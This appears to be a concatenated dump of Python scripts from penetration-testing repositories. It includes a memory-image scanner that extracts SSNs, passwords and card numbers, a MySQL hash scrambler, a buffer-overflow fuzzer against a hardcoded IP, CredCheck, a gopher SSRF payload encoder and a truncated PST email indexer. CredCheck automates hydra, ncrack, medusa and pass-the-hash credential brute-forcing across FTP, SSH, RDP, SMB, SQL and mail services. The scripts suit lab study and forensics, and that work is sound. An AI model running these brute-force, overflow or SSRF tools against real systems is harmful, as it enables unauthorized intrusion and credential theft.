val = lineList[1:]
self.zipDB[key] = val
self.zipLookup = True
except:
traceback.print_exc()
self.zipLookup = False
else:
self.lastError = "File does not exist"
except:
self.lastError = "File Exception Raised"
# Function to Iterate through a large file
# the file was opened during init
def readBUFF(self):
# Read in a bytearray
ba = bytearray(self.fp.read(MAXBUFF))
# substitute spaces for all non-ascii characters
# this improves the performance and accuracy of the
# regular expression searches
txt = re.sub('[^A-Za-z0-9 ~!@#$%^&*:;<>,.?/\-\(\)=+_]', ' ', ba)
# Return the resulting text string that will be searched
return txt
#searches file for patterns matching
# e-mails
# SSN
# URL
# U.S. Phone Numbers
# U.S. Postal Codes
# Strong Passwords
# Credit Card Numbers
def scanMem(self, quiet):
if not quiet:
print "\nScanning Memory Image "
# compile the regular expressions
usphPattern = re.compile(r'(1?(?: |\-|\.)?(?:\(\d{3}\)|\d{3})(?: |\-|\.)?\d{3}(?: |\-|\.)?\d{4})')
emailPattern = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}')
ssnPattern = re.compile(r'\d{3}-\d{2}-\d{4}')
urlPattern = re.compile(r'\w+:\/\/[\w@][\w.:@]+\/?[\w\.?=%&=\-@/$,]*')
pwPattern = re.compile(r'[A-Za-z0-9~!@#$%^&*;:]{6,12}')
ccPattern = re.compile(r'(3[47]\d{2}([ -]?)(?!(\d)\3{5}|123456|234567|345678)\d{6}\2(?!(\d)\4{4})\d{5}|((4\d|5[1-5]|65)\d{2}|6011)([ -]?)(?!(\d)\8{3}|1234|3456|5678)\d{4}\7(?!(\d)\9{3})\d{4}\7\d{4})')
zipPattern = re.compile(r'(?!00[02-5]|099|213|269|34[358]|353|419|42[89]|51[789]|529|53[36]|552|5[67]8|5[78]9|621|6[348]2|6[46]3|659|69[4-9]|7[034]2|709|715|771|81[789]|8[3469]9|8[4568]8|8[6-9]6|8[68]7|9[02]9|987)\d{5}')
cnt = 0
gbProcessed = 0
# Iterate through the file one chunk at a time
for bArray in iter(self.readBUFF, ''):
# Provides user feedback one dot = 16MB Chunk Processed
if not quiet:
if cnt < 64:
cnt +=1
print '.',
else:
# Print GB processed
gbProcessed += 1
print
print "GB Processed: ", gbProcessed
cnt = 0
# Perform e-mail search
try:
# email
partialResult = emailPattern.findall(bArray)
for key in partialResult:
key = str(key)
# Keep track of the number of occurrences
if key in self.emailDict:
curValue = self.emailDict[key]
curValue +=1
self.emailDict[key] = curValue
else:
curValue = 1
self.emailDict[key] = curValue
except:
traceback.print_exc()
curValue = 1
self.emailDict[key] = curValue
# Search for Strong Passwords
try:
# Password
partialResult = pwPattern.findall(bArray)
for key in partialResult:
key = str(key)
upper=0
lower=0
number=0
special=0
for eachChr in key:
if eachChr in "abcdefghijklmnopqrstuvwxyz":
lower = 1
elif eachChr in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
upper = 1
elif eachChr in '1234567890':
number = 1
elif eachChr in '~!@#$%^&*':
special = 1
if upper == 1 and lower == 1 and number == 1:
# Keep track of the number of occurrences
if key in self.pwDict:
curValue = self.pwDict[key]
curValue +=1
self.pwDict[key] = curValue
else:
curValue = 1
self.pwDict[key] = curValue
except:
curValue = 1
self.emailDict[key] = curValue
# Search for possible SS#
try:
# ssn
partialResult = ssnPattern.findall(bArray)
for key in partialResult:
key = str(key)
# Keep track of the number of occurrences
if key in self.ssnDict:
curValue = self.ssnDict[key]
curValue +=1
self.ssnDict[key] = curValue
else:
curValue = 1
self.ssnDict[key] = curValue
except:
curValue = 1
self.ssnDict[key] = curValue
# Search for URL's
try:
# url
partialResult = urlPattern.findall(bArray)
for key in partialResult:
key = str(key)
if key in self.urlDict:
curValue = self.urlDict[key]
curValue +=1
self.urlDict[key] = curValue
else:
curValue = 1
self.urlDict[key] = curValue
except:
curValue = 1
self.urlDict[key] = curValue
# Search for Credit Cards
try:
# Credit Card
partialResult = ccPattern.findall(bArray)
# Keep track of the number of occurrences
for key in partialResult:
key=str(key[0])
key = key.translate(None, '- ')
if key in self.ccDict:
curValue = self.ccDict[key]
curValue +=1
self.ccDict[key] = curValue
else:
curValue = 1
self.ccDict[key] = curValue
except:
curValue = 1
self.ccDict[key] = curValue
# Search for Phone Numbers
try:
# Phone Number
partialResult = usphPattern.findall(bArray)
for key in partialResult:
key = str(key)
key = key.strip()
if key[0] in '23456789\(':
# Keep track of the number of occurrences
if key in self.usphDict:
curValue = self.usphDict[key]
curValue +=1
self.usphDict[key] = curValue
else:
curValue = 1
self.usphDict[key] = curValue
except:
curValue = 1
self.usphDict[key] = curValue
# Search for valid US Postal Codes
try:
# Valid US Postal Codes
partialResult = zipPattern.findall(bArray)
for key in partialResult:
key = str(key)
# Keep track of the number of occurrences
if key in self.zipDict:
curValue = self.zipDict[key]
curValue +=1
self.zipDict[key] = curValue
else:
curValue = 1
self.zipDict[key] = curValue
except:
curValue = 1
self.zipDict[key] = curValue
return True
def printEmails(self):
print "\nPossible E-Mails"
print "================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.emailDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printURLs(self):
print "\nPossible URLs"
print "=============\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.urlDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printSSNs(self):
print "\nPossible SSNs"
print "=============\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ssnDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printPWs(self):
print "\nPossible PWs"
print "=============\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.pwDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printCCs(self):
print "\nPossible Credit Card #s"
print "=======================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ccDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printUSPHs(self):
print "\nPossible U.S. Phone #s"
print "=====================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.usphDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printZIPs(self):
print "\nPossible Valid U.S. Postal Codes"
print "================================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.zipDict.items()], reverse = True)]
# If the zipLookup Dictionary is available
# Obtain the associated City
# if lookup fails, skip possible ZipCode
if self.zipLookup:
for entry in sortedList:
if entry[0] in self.zipDB:
valList = self.zipDB[entry[0]]
print '%5d' % entry[1], '%s' % entry[0], '%s' % valList[0], '%s' % valList[1]
else:
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def csvEmails(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvEmail.csv", 'w')
tempList = ['Count', 'Possible E-mails']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvEmail.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.emailDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvURLs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvURL.csv", 'w')
tempList = ['Count', 'Possible URLs']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvURL.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.urlDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvSSNs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvSSN.csv", 'w')
tempList = ['Count', 'Possible SSNs']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvSSN.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ssnDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvPWs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvPW.csv", 'w')
tempList = ['Count', 'Possible Strong Passwords']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvPW.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.pwDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvCCs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvCC.csv", 'w')
tempList = ['Count', 'Possible Credit Cards']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvCC.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ccDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
def csvUSPHs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvUSPH.csv", 'w')
tempList = ['Count', 'Possible U.S. Phone Numbers']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvUSPH.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.usphDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvZIPs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvZIP.csv", 'w')
tempList = ['Count', 'Possible Valid U.S.Postal Codes']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvZIP.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.zipDict.items()], reverse = True)]
# If the zipLookup Dictionary is available
# Obtain the associated City
# if lookup fails, skip possible ZipCode
if self.zipLookup:
for entry in sortedList:
if entry[0] in self.zipDB:
valList = self.zipDB[entry[0]]
outStr = ",".join([str(entry[1]), entry[0], valList[0], valList[1]])
csvFile.write(outStr)
csvFile.write("\n")
else:
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def __del__(self):
return
# End Forensic File Class ====================================
| 37.24055 | 234 | 0.439676 |
PenTesting | from hashlib import sha1
import struct
def hash(word, salt):
return {"*%s"%_scramble(word,salt):word}
def _scramble(password, salt):
stage1 = sha1(password).digest()
stage2 = sha1(stage1).digest()
s = sha1()
s.update(salt)
s.update(stage2)
result = s.digest()
return _my_crypt(result, stage1)
def _my_crypt(message1, message2):
length = len(message1)
result = struct.pack('B', length)
for i in xrange(length):
x = (struct.unpack('B', message1[i:i+1])[0] ^ \
struct.unpack('B', message2[i:i+1])[0])
result += struct.pack('B', x)
return result
| 23.96 | 55 | 0.603531 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import os
import sys
import socket
ipAddr="192.168.1.104"
ipPort=9999
def start_me():
try:
global ipAddr
global ipPort
command="GMON ./:/"
command=command + "A" * 1000
command=command + "B" * 1000
command=command + "C" * 1000
command=command + "D" * 1000
command=command + "E" * 1000
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#print("testing11")
try:
if sys.argv[1] != None and sys.argv[2] != None:
ipAddr=sys.argv[1]
ipPort=sys.argv[2]
except Exception as ee:
pass
#print("testin22g")
sock.connect((ipAddr,int(ipPort)))
rec=sock.recv(1024)
print('Rec Banner initially is : ' +str(rec))
sock.send(command)
rec=sock.recv(1024)
print('Rec after is : ' +str(rec))
except Exception as ex:
print("Exception : " +str(ex))
start_me()
| 20.076923 | 55 | 0.649208 |
Penetration-Testing-Study-Notes | #!/usr/bin/python
###################################################
#
# CredCheck - written by Justin Ohneiser
# ------------------------------------------------
# Inspired by reconscan.py by Mike Czumak
#
# This program will check a set of credentials
# against a set of IP addresses looking for
# valid remote login access using two steps:
# 1. Light NMAP scan -> to identify services
# 2. Modular brute force for each service
#
# [Warning]:
# This script comes as-is with no promise of functionality or accuracy. I strictly wrote it for personal use
# I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the
# functions may not produce the desired results so use at your own risk/discretion. I wrote this script to
# target machines in a lab environment so please only use it against systems for which you have permission!!
#-------------------------------------------------------------------------------------------------------------
# [Modification, Distribution, and Attribution]:
# You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
# author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
# worth anything anyway :)
#
# Designed for use in Kali Linux 4.6.0-kali1-686
###################################################
import os, sys, subprocess
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
TIMECAP = 60
# ------------------------------------
# Toolbox
# ------------------------------------
def printHeader():
print ""
print "###################################################"
print "## CredCheck"
print "##"
print "###################################################"
print ""
def printUsage():
print "Usage: \t%s <user:pass | userpass-file> <target | target-file>" % sys.argv[0].split("/")[len(sys.argv[0].split("/"))-1]
def printPlus(message):
print bcolors.OKGREEN + "[+] " + message + bcolors.ENDC
def printMinus(message):
print "[-] " + message
def printStd(message):
print "[*] " + message
def printStdSpecial(message):
print bcolors.WARNING + "[*] " + message + bcolors.ENDC
def printErr(message):
print bcolors.FAIL + "[!] " + message + bcolors.ENDC
def printDbg(message):
print bcolors.OKBLUE + "[-] " + message + bcolors.ENDC
def parseNmapScan(results):
services = {}
lines = results.split("\n")
for line in lines:
ports = []
line = line.strip()
if ("tcp" in line or "udp" in line) and ("open" in line) and not ("filtered" in line) and not ("Discovered" in line):
while " " in line:
line = line.replace(" ", " ");
linesplit = line.split(" ")
service = linesplit[2]
port = linesplit[0]
if service in services:
ports = services[service]
ports.append(port)
services[service] = ports
return services
def dispatchModules(target, services, userpasses):
for service in services:
ports = services[service]
if service in KNOWN_SERVICES:
try:
KNOWN_SERVICES[service](target, ports, userpasses)
except AttributeError:
printDbg("No module available for %s - %s" % (service, ports))
else:
printDbg("No module available for %s - %s" % (service, ports))
def validateIp(s):
a = s.split('.')
if len(a) != 4:
return False
for x in a:
if not x.isdigit():
return False
i = int(x)
if i < 0 or i > 255:
return False
return True
def validateUserpass(userpass):
pieces = userpass.split(":")
if not len(pieces) == 2:
return False
return True
def isWindows(target):
NMAP = "nmap -p 445 --script smb-os-discovery %s | grep OS:" % target
try:
nmap_results = subprocess.check_output(NMAP, shell=True)
if not "Windows" in nmap_results:
printStd("Skipping: hash login not accessible")
return False
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % NMAP)
return False
except subprocess.CalledProcessError as ex:
if ex.returncode != 1:
raise Exception
printStd("Skipping: hash login not accessible")
return False
except Exception as e:
printErr("Unable to discover target compatibility:\n\t%s\n\n%s" % (NMAP, e))
return False
return True
# ------------------------------------
# Scans
# ------------------------------------
# Light NMAP
# ========================
def conductLightNmap(target):
printStdSpecial("Investigating %s" % target)
NAME = "nmap_light"
# Conduct Scan #
TCPSCAN = "nmap %s" % target
UDPSCAN = "nmap -sU -p 161 %s" % target
tcpResults = ""
udpResults = ""
try:
tcpResults = subprocess.check_output(TCPSCAN, shell=True)
udpResults = subprocess.check_output(UDPSCAN, shell=True)
print "%s" % tcpResults
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % TCPSCAN)
except Exception as e:
printErr("Unable to conduct light nmap scan:\n\t%s\n\n%s" % (TCPSCAN, e))
sys.exit(2)
# Filter Results #
services = parseNmapScan("%s\n%s" % (tcpResults, udpResults))
return services
# ========================
# FTP
# ========================
def ftp(target, ports, userpasses):
printStdSpecial("Checking FTP")
for userpass in userpasses:
HYDRA = "timeout %s hydra -l %s -p %s ftp://%s 2>&1" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
try:
hydraResults = subprocess.check_output(HYDRA, shell=True)
if "valid password found" in hydraResults:
for line in hydraResults.splitlines():
if "host" in line:
printPlus(line)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % HYDRA)
break
except Exception:
printErr("Unable to conduct FTP Brute:\n\t%s" % HYDRA)
# ========================
# SSH
# ========================
def ssh(target, ports, userpasses):
printStdSpecial("Checking SSH")
for userpass in userpasses:
HYDRA = "timeout %s hydra -l %s -p %s ssh://%s -t 4 2>&1" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
try:
hydraResults = subprocess.check_output(HYDRA, shell=True)
if "valid password found" in hydraResults:
for line in hydraResults.splitlines():
if "host" in line:
printPlus(line)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % HYDRA)
break
except Exception:
printErr("Unable to conduct SSH Brute:\n\t%s" % HYDRA)
# ========================
# RDP
# ========================
def rdp(target, ports, userpasses):
printStdSpecial("Checking RDP")
for userpass in userpasses:
NCRACK = "timeout %i ncrack -vv --user %s --pass %s rdp://%s" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
NCRACK_SSL = "%s -g ssl=yes" % NCRACK
try:
ncrackResults = "%s%s" % (subprocess.check_output(NCRACK, shell=True), subprocess.check_output(NCRACK_SSL, shell=True))
if "Discovered credentials" in ncrackResults:
printPlus(userpass)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % NCRACK)
break
except Exception:
printErr("Unable to conduct RDP Brute:\n\t%s" % NCRACK)
# ========================
# SMB
# ========================
def smb(target, ports, userpasses):
printStdSpecial("Checking SMB")
for userpass in userpasses:
ACCCHECK = "timeout %i acccheck -t %s -u %s -p %s -v" % (TIMECAP, target, userpass.split(":")[0], userpass.split(":")[1])
try:
acccheck_results = subprocess.check_output(ACCCHECK, shell=True)
if "SUCCESS" in acccheck_results:
printPlus(userpass)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % ACCCHECK)
break
except Exception:
printErr("Unable to conduct SMB brute:\n\t%s" % ACCCHECK)
if not isWindows(target):
return
printStd("Checking Pass the Hash")
for userpass in userpasses:
WINEXE = "timeout %i pth-winexe -U %s%%%s --uninstall //%s whoami 2>&1" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
try:
winexe_results = subprocess.check_output(WINEXE, shell=True)
if not "ERROR" in winexe_results:
printPlus("pth-winexe -U %s%%%s --uninstall //%s cmd" % (userpass.split(":")[0], userpass.split(":")[1], target))
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % WINEXE)
break
except Exception:
printErr("Unable to conduct PTH brute:\n\t%s" % WINEXE)
# ========================
# MSSQL
# ========================
def ms_sql(target, ports, userpasses):
printStdSpecial("Checking MS-SQL")
for userpass in userpasses:
MEDUSA = "timeout %i medusa -h %s -u %s -p %s -M mssql -L -f 2>&1" % (TIMECAP, target, userpass.split(":")[0], userpass.split(":")[1])
try:
medusa_results = subprocess.check_output(MEDUSA, shell=True)
if "ACCOUNT FOUND" in medusa_results:
printPlus(userpass)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % MEDUSA)
break
except Exception:
printErr("Unable to conduct MS-SQL brute:\n\t%s" % MEDUSA)
# ========================
# MySQL
# ========================
def mysql(target, ports, userpasses):
printStdSpecial("Checking MySQL")
for userpass in userpasses:
MEDUSA = "timeout %i medusa -h %s -u %s -p %s -M mysql -L -f 2>&1" % (TIMECAP, target, userpass.split(":")[0], userpass.split(":")[1])
try:
medusa_results = subprocess.check_output(MEDUSA, shell=True)
if "ACCOUNT FOUND" in medusa_results:
printPlus(userpass)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % MEDUSA)
break
except Exception:
printErr("Unable to conduct MySQL brute:\n\t%s" % MEDUSA)
# ========================
# SMTP
# ========================
def smtp(target, ports, userpasses):
printStdSpecial("Checking SMTP")
for userpass in userpasses:
HYDRA = "timeout %i hydra -l %s -p %s smtp://%s 2>&1" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
try:
hydra_results = subprocess.check_output(HYDRA, shell=True)
if "valid password found" in hydra_results:
for line in hydra_results.splitlines():
if "host" in line:
printPlus(line)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % HYDRA)
break
except Exception:
printErr("Unable to conduct SMTP brute:\n\t%s" % HYDRA)
# ========================
# POP3
# ========================
def pop3(target, ports, userpasses):
printStdSpecial("Checking POP3")
for userpass in userpasses:
HYDRA = "timeout %i hydra -l %s -p %s pop3://%s 2>&1" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
try:
hydra_results = subprocess.check_output(HYDRA, shell=True)
if "valid password found" in hydra_results:
for line in hydra_results.splitlines():
if "host" in line:
printPlus(line)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % HYDRA)
break
except Exception:
printErr("Unable to conduct POP3 brute:\n\t%s" % HYDRA)
# ========================
# IMAP
# ========================
def imap(target, ports, userpasses):
printStdSpecial("Checking imap")
for userpass in userpasses:
HYDRA = "timeout %i hydra -l %s -p %s imap://%s 2>&1" % (TIMECAP, userpass.split(":")[0], userpass.split(":")[1], target)
try:
hydra_results = subprocess.check_output(HYDRA, shell=True)
if "valid password found" in hydra_results:
for line in hydra_results.splitlines():
if "host" in line:
printPlus(line)
else:
printMinus(userpass)
except KeyboardInterrupt:
printMinus("Skipping:\n\t%s" % HYDRA)
break
except Exception:
printErr("Unable to conduct IMAP brute:\n\t%s" % HYDRA)
# ========================
# ------------------------------------
# Main
# ------------------------------------
KNOWN_SERVICES = {
"ftp" : ftp,
"ssh" : ssh,
"ms-wbt-server" : rdp,
"netbios-ssn" : smb,
"ms-sql-s" : ms_sql,
"mysql" : mysql,
"smtp" : smtp,
"pop3" : pop3,
"imap" : imap
}
def main(argv):
if len(sys.argv) != 3:
printUsage()
sys.exit(2)
# Validate Userpasses
USERPASSES = []
if os.path.isfile(sys.argv[1]):
with open(sys.argv[1]) as f:
for line in f:
if not validateUserpass(line.strip()):
printErr("Invalid userpass format: %s" % line.strip())
continue
USERPASSES.append(line.strip())
else:
if not validateUserpass(sys.argv[1]):
printErr("Invalid userpass format: %s" % sys.argv[1])
printUsage()
sys.exit(2)
USERPASSES = [sys.argv[1]]
# Validate Targets
TARGETS = []
if os.path.isfile(sys.argv[2]):
with open(sys.argv[2]) as f:
for line in f:
if not validateIp(line.strip()):
printErr("Invalid target format: %s" % line.strip())
continue
TARGETS.append(line.strip())
else:
if not validateIp(sys.argv[2]):
printErr("Invalid target format: %s" % sys.argv[2])
printUsage()
sys.exit(2)
TARGETS = [sys.argv[2]]
# Begin
printHeader()
try:
for target in TARGETS:
SERVICES = conductLightNmap(target)
dispatchModules(target, SERVICES, USERPASSES)
except KeyboardInterrupt:
print "\n\nExiting.\n"
sys.exit(1)
if __name__ == "__main__":
main(sys.argv[1:])
| 32.545652 | 147 | 0.52897 |
Tricks-Web-Penetration-Tester | import urllib.parse
payload = input("insert payload:\n")
cmd=payload+"\r\nquit\r\n\r\n"
print("gopher://localhost:1211/_",end="")
print(urllib.parse.quote(urllib.parse.quote(cmd))) | 30.166667 | 50 | 0.698925 |
cybersecurity-penetration-testing | import os
import sys
import argparse
import logging
import jinja2
import pypff
import unicodecsv as csv
from collections import Counter
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This scripts handles processing and output of PST Email Containers'
output_directory = ""
date_dict = {x:0 for x in xrange(1, 25)}
date_list = [date_dict.copy() for x in xrange(7)]
def main(pst_file, report_name):
"""
The main function opens a PST and calls functions to parse and report data from the PST
:param pst_file: A string representing the path to the PST file to analyze
:param report_name: Name of the report title (if supplied by the user)
:return: None
"""
logging.debug("Opening PST for processing...")
pst_name = os.path.split(pst_file)[1]
opst = pypff.open(pst_file)
root = opst.get_root_folder()
logging.debug("Starting traverse of PST structure...")
folderTraverse(root)
logging.debug("Generating Reports...")
top_word_list = wordStats()
top_sender_list = senderReport()
dateReport()
HTMLReport(report_name, pst_name, top_word_list, top_sender_list)
def makePath(file_name):
"""
The makePath function provides an absolute path between the output_directory and a file
:param file_name: A string representing a file name
:return: A string representing the path to a specified file
"""
return os.path.abspath(os.path.join(output_directory, file_name))
def folderTraverse(base):
"""
The folderTraverse function walks through the base of the folder and scans for sub-folders and messages
:param base: Base folder to scan for new items within the folder.
:return: None
"""
for folder in base.sub_folders:
if folder.number_of_sub_folders:
folderTraverse(folder) # Call new folder to traverse:
checkForMessages(folder)
def checkForMessages(folder):
"""
The checkForMessages function reads folder messages if present and passes them to the report function
:param folder: pypff.Folder object
:return: None
"""
logging.debug("Processing Folder: " + folder.name)
message_list = []
for message in folder.sub_messages:
message_dict = processMessage(message)
message_list.append(message_dict)
folderReport(message_list, folder.name)
def processMessage(message):
"""
The processMessage function processes multi-field messages to simplify collection of information
:param message: pypff.Message object
:return: A dictionary with message fields (values) and their data (keys)
"""
return {
"subject": message.subject,
"sender": message.sender_name,
"header": message.transport_headers,
"body": message.plain_text_body,
"creation_time": message.creation_time,
"submit_time": message.client_submit_time,
"delivery_time": message.delivery_time,
"attachment_count": message.number_of_attachments,
}
def folderReport(message_list, folder_name):
"""
The folderReport function generates a report per PST folder
:param message_list: A list of messages discovered during scans
:folder_name: The name of an Outlook folder within a PST
:return: None
"""
if not len(message_list):
logging.warning("Empty message not processed")
return
# CSV Report
fout_path = makePath("folder_report_" + folder_name + ".csv")
fout = open(fout_path, 'wb')
header = ['creation_time', 'submit_time', 'delivery_time',
'sender', 'subject', 'attachment_count']
csv_fout = csv.DictWriter(fout, fieldnames=header, extrasaction='ignore')
csv_fout.writeheader()
csv_fout.writerows(message_list)
fout.close()
# HTML Report Prep
global date_list # Allow access to edit global variable
body_out = open(makePath("message_body.txt"), 'a')
senders_out = open(makePath("senders_names.txt"), 'a')
for m in message_list:
if m['body']:
body_out.write(m['body'] + "\n\n")
if m['sender']:
senders_out.write(m['sender'] + '\n')
# Creation Time
day_of_week = m['creation_time'].weekday()
hour_of_day = m['creation_time'].hour + 1
date_list[day_of_week][hour_of_day] += 1
# Submit Time
day_of_week = m['submit_time'].weekday()
hour_of_day = m['submit_time'].hour + 1
date_list[day_of_week][hour_of_day] += 1
# Delivery Time
day_of_week = m['delivery_time'].weekday()
hour_of_day = m['delivery_time'].hour + 1
date_list[day_of_week][hour_of_day] += 1
body_out.close()
senders_out.close()
def wordStats(raw_file="message_body.txt"):
"""
The wordStats function reads and counts words from a file
:param raw_file: The path to a file to read
:return: A list of word frequency counts
"""
word_list = Counter()
for line in open(makePath(raw_file), 'r').readlines():
for word in line.split():
# Prevent too many false positives/common words
if word.isalnum() and len(word) > 4:
word_list[word] += 1
return wordReport(word_list)
def wordReport(word_list):
"""
The wordReport function counts a list of words and returns results in a CSV format
:param word_list: A list of words to iterate through
:return: None or html_report_list, a list of word frequency counts
"""
if not word_list:
logging.debug('Message body statistics not available')
return
fout = open(makePath("frequent_words.csv"), 'wb')
fout.write("Count,Word\n")
for e in word_list.most_common():
if len(e) > 1:
fout.write(str(e[1]) + "," + str(e[0]) + "\n")
fout.close()
html_report_list = []
for e in word_list.most_common(10):
html_report_list.append({"word": str(e[0]), "count": str(e[1])})
return html_report_list
def senderReport(raw_file="senders_names.txt"):
"""
The senderReport function reports the most frequent_senders
:param raw_file: The file to read raw information
:return: html_report_list, a list of the most frequent senders
"""
sender_list = Counter(open(makePath(raw_file), 'r').readlines())
fout = open(makePath("frequent_senders.csv"), 'wb')
fout.write("Count,Sender\n")
for e in sender_list.most_common():
if len(e) > 1:
fout.write(str(e[1]) + "," + str(e[0]))
fout.close()
html_report_list = []
for e in sender_list.most_common(5):
html_report_list.append({"label": str(e[0]), "count": str(e[1])})
return html_report_list
def dateReport():
"""
The dateReport function writes date information in a TSV report. No input args as the filename
is static within the HTML dashboard
:return: None
"""
csv_out = open(makePath("heatmap.tsv"), 'w')
csv_out.write("day\thour\tvalue\n")
for date, hours_list in enumerate(date_list):
for hour, count in hours_list.items():
to_write = str(date+1) + "\t" + str(hour) + "\t" + str(count) + "\n"
csv_out.write(to_write)
csv_out.flush()
csv_out.close()
def HTMLReport(report_title, pst_name, top_words, top_senders):
"""
The HTMLReport function generates the HTML report from a Jinja2 Template
:param report_title: A string representing the title of the report
:param pst_name: A string representing the file name of the PST
:param top_words: A list of the top 10 words
:param top_senders: A list of the top 10 senders
:return: None
"""
open_template = open("stats_template.html", 'r').read()
html_template = jinja2.Template(open_template)
context = {"report_title": report_title, "pst_name": pst_name,
"word_frequency": top_words, "percentage_by_sender": top_senders}
new_html = html_template.render(context)
html_report_file = open(makePath(report_title+".html"), 'w')
html_report_file.write(new_html)
html_report_file.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(version=str(__version__), description=__description__,
epilog='Developed by ' + __author__ + ' on ' + __date__)
parser.add_argument('PST_FILE', help="PST File Format from Microsoft Outlook")
parser.add_argument('OUTPUT_DIR', help="Directory of output for temporary and report files.")
parser.add_argument('--title', help='Title of the HTML Report. (default=PST Report)',
default="PST Report")
parser.add_argument('-l', help='File path of log file.')
args = parser.parse_args()
output_directory = os.path.abspath(args.OUTPUT_DIR)
if not os.path.exists(output_directory):
os.makedirs(output_directory)
if args.l:
if not os.path.exists(args.l):
os.makedirs(args.l)
log_path = os.path.join(args.l, 'pst_indexer.log')
else:
